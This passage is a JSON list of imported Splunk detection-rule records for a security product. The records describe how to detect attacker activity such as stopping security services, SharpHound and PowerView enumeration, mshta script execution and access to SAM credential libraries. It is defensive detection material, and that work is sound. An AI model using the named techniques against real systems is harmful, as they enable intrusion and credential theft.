If confirmed malicious, this behavior could compromise the endpoint and the entire network, necessitating immediate investigation and response.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-attempt-to-stop-security-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9ed27cea-4e27-4eff-b2c6-aac9e78a7517", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_attempt_to_stop_security_service.yml" } }, { "id": "splunk-security-content-9f2295a0-0dcb-4a5f-b013-8a6f2a3c11f6", "type": "detection", "name": "Cisco Secure Firewall - High Volume of Intrusion Events Per Host", "description": "The following analytic detects internal systems that generate an unusually high volume of intrusion detections within a 30-minute window. It leverages Cisco Secure Firewall Threat Defense logs, specifically focusing on the IntrusionEvent event type, to identify hosts that trigger more than 15 Snort-based signatures during that time. A sudden spike in intrusion alerts originating from a single host may indicate suspicious or malicious activity such as malware execution, command-and-control communication, vulnerability scanning, or lateral movement. In some cases, this behavior may also be caused by misconfigured or outdated software repeatedly tripping detection rules. 
Systems exhibiting this pattern should be triaged promptly, as repeated Snort rule matches from a single source are often early indicators of compromise, persistence, or active exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1071", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-high-volume-of-intrusion-events-per-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f2295a0-0dcb-4a5f-b013-8a6f2a3c11f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___high_volume_of_intrusion_events_per_host.yml" } }, { "id": "splunk-security-content-9f2b7b1d-6c2f-4f2d-9a8b-8a1d7c5f2e11", "type": "detection", "name": "Cisco Isovalent - Non Allowlisted Image Use", "description": "The following analytic detects use of container images that fall outside an approved\nallowlist, leveraging Cisco Isovalent/Tetragon runtime telemetry (image name and\nworkload identity). Adversaries commonly introduce untrusted or newly published\nimages to deploy tooling, establish persistence, or abuse supply\u2011chain trust. This\nbehavior may indicate image pulls from unauthorized registries, execution of\nunvetted software, or a drift from established deployment baselines. 
Extra scrutiny\nis warranted for namespaces and workloads that normally source images from restricted\nregistries, and for pods that suddenly begin running images outside expected\nprefixes.\nMaintain an environment\u2011specific allowlist via the macro `cisco_isovalent_allowed_images`\n(for example, allow trusted registries/prefixes such as ImageName=\"gcr.io/org/*\",\n\"registry.local/*\", or \"myco/*\") and keep it updated as new baseline images are\nintroduced. This analytic alerts on images NOT matching the allowlist.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-non-allowlisted-image-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f2b7b1d-6c2f-4f2d-9a8b-8a1d7c5f2e11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___non_allowlisted_image_use.yml" } }, { "id": "splunk-security-content-9f306e0a-1c36-469e-8892-968ca12470dd", "type": "detection", "name": "Linux Auditd At Application Execution", "description": "The following analytic detects the execution of the \"At\" application in Linux, which can be used by attackers to create persistence entries on a compromised host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent process names associated with \"at\" or \"atd\". 
This activity is significant because the \"At\" application can be exploited to maintain unauthorized access or deliver additional malicious payloads. If confirmed malicious, this behavior could lead to data theft, ransomware attacks, or other severe consequences. Immediate investigation is required to determine the legitimacy of the execution and mitigate potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-at-application-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f306e0a-1c36-469e-8892-968ca12470dd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_at_application_execution.yml" } }, { "id": "splunk-security-content-9f31aa8e-e37c-46bc-bce1-8b3be646d026", "type": "detection", "name": "Detect AWS Console Login by User from New Region", "description": "The following analytic identifies AWS console login attempts by users from a new region. It leverages AWS CloudTrail events and compares current login regions against a baseline of previously seen regions for each user. This activity is significant as it may indicate unauthorized access attempts or compromised credentials. 
If confirmed malicious, an attacker could gain unauthorized access to AWS resources, potentially leading to data breaches, resource manipulation, or further lateral movement within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-user-from-new-region.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f31aa8e-e37c-46bc-bce1-8b3be646d026", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_user_from_new_region.yml" } }, { "id": "splunk-security-content-9fb562f4-42f8-4139-8e11-a82edf7ed718", "type": "detection", "name": "Remote System Discovery with Dsquery", "description": "The following analytic detects the execution of `dsquery.exe` with the `computer` argument, which is used to discover remote systems within a domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Remote system discovery is significant as it indicates potential reconnaissance activities by adversaries or Red Teams to map out network resources and Active Directory structures. 
If confirmed malicious, this activity could lead to further exploitation, lateral movement, and unauthorized access to critical systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-system-discovery-with-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9fb562f4-42f8-4139-8e11-a82edf7ed718", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_system_discovery_with_dsquery.yml" } }, { "id": "splunk-security-content-9fcb214a-dc42-4ce7-a650-f1d2cab16a6a", "type": "detection", "name": "PaperCut NG Remote Web Access Attempt", "description": "The following analytic detects potential exploitation attempts on publicly accessible PaperCut NG servers.\nIt identifies connections from public IP addresses to the server, specifically monitoring URI paths commonly used in proof-of-concept scripts for exploiting PaperCut NG vulnerabilities.\nThis detection leverages web traffic data from the `Web` datamodel, focusing on specific URI paths and excluding internal IP ranges.\nThis activity is significant as it may indicate an attempt to exploit known vulnerabilities in PaperCut NG, potentially leading to unauthorized access or control of the server.\nIf confirmed malicious, attackers could gain administrative access, leading to data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/papercut-ng-remote-web-access-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9fcb214a-dc42-4ce7-a650-f1d2cab16a6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/papercut_ng_remote_web_access_attempt.yml" } }, { "id": "splunk-security-content-9fdbf709-4c46-4819-9fb6-98b2d72059ed", "type": "detection", "name": "Zoom Rare Audio Devices", "description": "Detects rare audio devices from Zoom logs. Actors performing Remote Employment Fraud (REF) typically use unusual device information compared to the majority of employees. 
Detecting this activity requires careful analysis, regular review, and a thorough understanding of the audio and video devices commonly used within your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-rare-audio-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9fdbf709-4c46-4819-9fb6-98b2d72059ed", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_rare_audio_devices.yml" } }, { "id": "splunk-security-content-9ff4ca95-fdae-4eea-9ffa-6d8e1c202a71", "type": "detection", "name": "GitHub Organizations Repository Deleted", "description": "The following analytic identifies when a repository is deleted within a GitHub organization. The detection monitors GitHub Organizations audit logs for repository deletion events by tracking actor details, repository information, and associated metadata. This behavior is concerning for SOC teams as malicious actors may attempt to delete repositories to destroy source code, intellectual property, or evidence of compromise. Repository deletion can result in permanent loss of code, documentation, and project history if proper backups are not maintained. Additionally, unauthorized repository deletion could indicate account compromise, insider threats, or attempts to disrupt business operations. 
The impact of a repository deletion attack includes loss of intellectual property, disruption to development workflows, and potential financial losses from lost work. Early detection of unauthorized repository deletions allows security teams to investigate potential compromises and restore from backups if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-repository-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9ff4ca95-fdae-4eea-9ffa-6d8e1c202a71", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_repository_deleted.yml" } }, { "id": "splunk-security-content-a02ad386-e26d-44ce-aa97-6a46cee31439", "type": "detection", "name": "Windows Modify Registry WuServer", "description": "The following analytic detects suspicious modifications to the Windows Update Server (WUServer) registry settings. It leverages data from the Endpoint.Registry data model to identify changes in the registry path associated with Windows Update configurations. This activity is significant because adversaries, including malware like RedLine Stealer, exploit this technique to bypass detection and deploy additional payloads. 
If confirmed malicious, this registry modification could allow attackers to evade defenses, potentially leading to further system compromise and persistent unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-wuserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a02ad386-e26d-44ce-aa97-6a46cee31439", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_wuserver.yml" } }, { "id": "splunk-security-content-a04832e7-9d1d-49b1-a684-e31bcd775c77", "type": "detection", "name": "MacOS LoginHook Persistence", "description": "Identifies attempts to configure a macOS LoginHook via the defaults utility. 
LoginHooks enable automatic execution of a script or program upon user login and have historically been abused for persistence.\nCreation or modification of this setting may indicate an attempt to establish startup execution outside standard LaunchAgent mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1037.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-loginhook-persistence.yaml", "provenance": { "source": "splunk/security_content", "source_id": "a04832e7-9d1d-49b1-a684-e31bcd775c77", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_loginhook_persistence.yml" } }, { "id": "splunk-security-content-a081836a-ba4d-11eb-8593-acde48001122", "type": "detection", "name": "WinRM Spawning a Process", "description": "The following analytic detects suspicious processes spawned by WinRM (wsmprovhost.exe). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific child processes like cmd.exe, powershell.exe, and others. This activity is significant as it may indicate exploitation attempts of vulnerabilities like CVE-2021-31166, which could lead to system instability or compromise. 
If confirmed malicious, attackers could execute arbitrary commands, escalate privileges, or maintain persistence, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winrm-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a081836a-ba4d-11eb-8593-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winrm_spawning_a_process.yml" } }, { "id": "splunk-security-content-a0873b32-5b68-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect mshta inline hta execution", "description": "The following analytic detects the execution of \"mshta.exe\" with inline protocol handlers such as \"JavaScript\", \"VBScript\", and \"About\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments and process details. This activity is significant because mshta.exe can be exploited to execute malicious scripts, potentially leading to unauthorized code execution. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or establish persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mshta-inline-hta-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a0873b32-5b68-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mshta_inline_hta_execution.yml" } }, { "id": "splunk-security-content-a0bdd2f6-c2ff-11eb-b918-acde48001122", "type": "detection", "name": "Detect SharpHound Command-Line Arguments", "description": "The following analytic detects the execution of SharpHound command-line arguments, specifically `-collectionMethod` and `invoke-bloodhound`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as SharpHound is commonly used for Active Directory enumeration, which can be a precursor to lateral movement or privilege escalation. 
If confirmed malicious, this activity could allow an attacker to map out the network, identify high-value targets, and plan further attacks, potentially compromising sensitive information and critical systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-sharphound-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a0bdd2f6-c2ff-11eb-b918-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_sharphound_command_line_arguments.yml" } }, { "id": "splunk-security-content-a0c21379-f4ba-4bac-a958-897e260f964a", "type": "detection", "name": "Zscaler Scam Destinations Threat Blocked", "description": "The following analytic identifies blocked scam-related activities detected by Zscaler within a network. It leverages web proxy logs to examine actions flagged as scam threats, focusing on data points such as device owner, user, URL category, destination URL, and IP. This detection is significant for SOC as it helps in the early identification and mitigation of scam activities, ensuring network safety. 
If confirmed malicious, this activity could indicate attempts to deceive users, potentially leading to data theft or financial loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-scam-destinations-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a0c21379-f4ba-4bac-a958-897e260f964a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_scam_destinations_threat_blocked.yml" } }, { "id": "splunk-security-content-a115fba6-5514-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious MSBuild Spawn", "description": "The following analytic identifies instances where wmiprvse.exe spawns msbuild.exe, which is unusual and indicative of potential misuse of a COM object. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process relationships and command-line executions. This activity is significant because msbuild.exe is typically spawned by devenv.exe during legitimate Visual Studio use, not by wmiprvse.exe. 
If confirmed malicious, this behavior could indicate an attacker executing arbitrary code or scripts, potentially leading to system compromise or further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-msbuild-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a115fba6-5514-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_msbuild_spawn.yml" } }, { "id": "splunk-security-content-a14803b2-4bd9-4c08-8b57-c37980edebe8", "type": "detection", "name": "Windows Forest Discovery with GetForestDomain", "description": "The following analytic detects the execution of the `Get-ForestDomain` cmdlet, a component of the PowerView toolkit used for Windows domain enumeration. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. Detecting `Get-ForestDomain` is significant because adversaries and Red Teams use it to gather detailed information about Active Directory forest and domain configurations. 
If confirmed malicious, this activity could enable attackers to understand the domain structure, facilitating lateral movement or privilege escalation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-forest-discovery-with-getforestdomain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a14803b2-4bd9-4c08-8b57-c37980edebe8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_forest_discovery_with_getforestdomain.yml" } }, { "id": "splunk-security-content-a15aa1ab-2b79-467f-8201-65e0f32d5b1a", "type": "detection", "name": "Windows RunMRU Command Execution", "description": "The following analytic detects modifications to the Windows RunMRU registry key, which stores a history of commands executed through the Run dialog box (Windows+R). It leverages Endpoint Detection and Response (EDR) telemetry to monitor registry events targeting this key. This activity is significant as malware often uses the Run dialog to execute malicious commands while attempting to appear legitimate. If confirmed malicious, this could indicate an attacker using indirect command execution techniques for defense evasion or persistence. 
The detection excludes MRUList value changes to focus on actual command entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-runmru-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a15aa1ab-2b79-467f-8201-65e0f32d5b1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_runmru_command_execution.yml" } }, { "id": "splunk-security-content-a16b797d-e309-41bd-8ba0-5067dae2e4be", "type": "detection", "name": "Detect Remote Access Software Usage DNS", "description": "The following analytic detects DNS queries to domains associated with known remote access software such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer. This detection is crucial as adversaries often use these tools to maintain access and control over compromised environments. 
Identifying such behavior is vital for a Security Operations Center (SOC) because unauthorized remote access can lead to data breaches, ransomware attacks, and other severe impacts if these threats are not mitigated promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a16b797d-e309-41bd-8ba0-5067dae2e4be", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_remote_access_software_usage_dns.yml" } }, { "id": "splunk-security-content-a17af481-e2ad-494c-9da6-afb4d243a019", "type": "detection", "name": "Windows Registry Entries Restored Via Reg", "description": "The following analytic detects the execution of reg.exe with the \"restore\" parameter, indicating an attempt to restore registry backup data on a host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate post-exploitation actions, such as those performed by tools like winpeas, which use \"reg save\" and \"reg restore\" to manipulate registry settings. 
If confirmed malicious, this could allow an attacker to revert registry changes, potentially bypassing security controls and maintaining persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-entries-restored-via-reg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a17af481-e2ad-494c-9da6-afb4d243a019", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_entries_restored_via_reg.yml" } }, { "id": "splunk-security-content-a18e85d7-8b98-4399-820c-d46a1ca3516f", "type": "detection", "name": "Windows Gather Victim Identity SAM Info", "description": "The following analytic detects processes loading the samlib.dll or samcli.dll modules, which are often abused to access Security Account Manager (SAM) objects or credentials on domain controllers. This detection leverages Sysmon EventCode 7 to identify these DLLs being loaded outside typical system directories. Monitoring this activity is crucial as it may indicate attempts to gather sensitive identity information. 
If confirmed malicious, this behavior could allow attackers to obtain credentials, escalate privileges, or further infiltrate the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1589.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gather-victim-identity-sam-info.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a18e85d7-8b98-4399-820c-d46a1ca3516f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_gather_victim_identity_sam_info.yml" } }, { "id": "splunk-security-content-a19b354d-0d7f-47f3-8ea6-1a7c36434968", "type": "detection", "name": "AWS Credential Access Failed Login", "description": "The following analytic identifies unsuccessful login attempts to the AWS Management Console using a specific user identity. It leverages AWS CloudTrail logs to detect failed authentication events associated with the AWS ConsoleLogin action. This activity is significant for a SOC because repeated failed login attempts may indicate a brute force attack or unauthorized access attempts. 
If confirmed malicious, an attacker could potentially gain access to AWS account services and resources, leading to data breaches, resource manipulation, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-credential-access-failed-login.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a19b354d-0d7f-47f3-8ea6-1a7c36434968", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_credential_access_failed_login.yml" } }, { "id": "splunk-security-content-a1b229e9-d962-4222-8c62-905a8a010453", "type": "detection", "name": "O365 Service Principal New Client Credentials", "description": "The following analytic detects the addition of new credentials for Service Principals within an Office 365 tenant. It uses O365 audit logs, focusing on events related to credential modifications or additions in the AzureActiveDirectory workload. This activity is significant because Service Principals represent application identities, and their credentials allow applications to authenticate and access resources. 
If an attacker successfully adds or modifies these credentials, they can impersonate the application, leading to unauthorized data access, data exfiltration, or malicious operations under the application's identity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-service-principal-new-client-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1b229e9-d962-4222-8c62-905a8a010453", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_service_principal_new_client_credentials.yml" } }, { "id": "splunk-security-content-a1b2c3d4-e5f6-4789-a012-3456789abcde", "type": "detection", "name": "Windows BitDefender Submission Wizard DLL Sideloading", "description": "Detects DLL side-loading of Bitdefender Submission Wizard (BDSubmit.exe, bdsw.exe, or renamed BluetoothService.exe) when a malicious log.dll is loaded from a non-standard path via Sysmon ImageLoad events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitdefender-submission-wizard-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
